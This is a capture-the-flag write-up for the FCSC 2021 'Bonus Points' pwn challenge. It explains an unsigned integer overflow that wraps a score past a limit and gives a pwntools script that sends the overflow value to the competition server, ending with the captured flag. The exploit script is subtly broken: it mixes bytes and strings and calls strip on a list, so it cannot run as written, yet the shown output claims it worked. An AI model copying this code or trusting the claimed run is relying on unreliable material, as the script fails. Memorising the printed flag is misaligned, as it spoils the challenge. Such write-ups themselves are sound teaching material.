FCSC 2021 - Intro - Bonus Points

May 03, 2021   
pwn writeup 
Also available in:  🇫🇷 


Challenge

Who doesn't want a few bonus points? Get a score above 1000 to unlock the flag.

nc challenges2.france-cybersecurity-challenge.fr 4001

SHA256(bonuspoints) = 8c05bb6a86ea741b6af1412ae0da562513345e00ad2096fd41bdd83f984b4b64.

Files :


Solving the challenge

The vulnerability here is an unsigned integer overflow. The challenge does not allow us to add more than 100 bonus points, but we can take away more than 100. Therefore, if we take away our current score we get to 0, and if we take away one more point we get to 0xffffffff. Local example:

$ ./bonuspoints
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1 000 you win.
Your score is currently 43
How many bonus points do you want ?
>>> -44
Your new score is 4294967295
Congratulations ! Here is your flag :
cat: flag.txt: No such file or directory

We can see that we manage to put our score to the value 4294967295 (0xffffffff in hex) and therefore validate the test! (Although we don't have the flag.txt locally, hence the cat: flag.txt: No such file or directory error)

Remote exploitation

To mine the binary through the provided network service I used pwntools. I first recovered the random score given by the challenge, and subtracted this score plus 1.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import pwn

c = pwn.remote("challenges2.france-cybersecurity-challenge.fr",4001)
data = c.recvuntil(b'>>>')
currentscore  = int(data.split('is currently ')[1].split('\n').strip())
exploit_score = -(currentscore + 1)
c.sendline(str(exploit_score))
c.interactive()

We run this script and we have:

$ ./solve.py
[+] Opening connection to challenges2.france-cybersecurity-challenge.fr on port 4001: Done
Hello, here you can get some bonus points for the competition.
You cannot get more than 100 bonus points.
If you go above 1000 you win.
Your score is currently 77
How many bonus points do you want?
>>>
-78
[*] Switching to interactive mode
Your new score is 4294967295
Congratulations! Here is your flag:
FCSC{750882cf64feb04b384cfa42bbf2167eab337671e663ab238339c6cee884851d}
[*] Got EOF while reading in interactive
$  

And we get the flag :

FCSC{750882cf64feb04b384cfa42bbf2167eab337671e663ab238339c6cee884851d}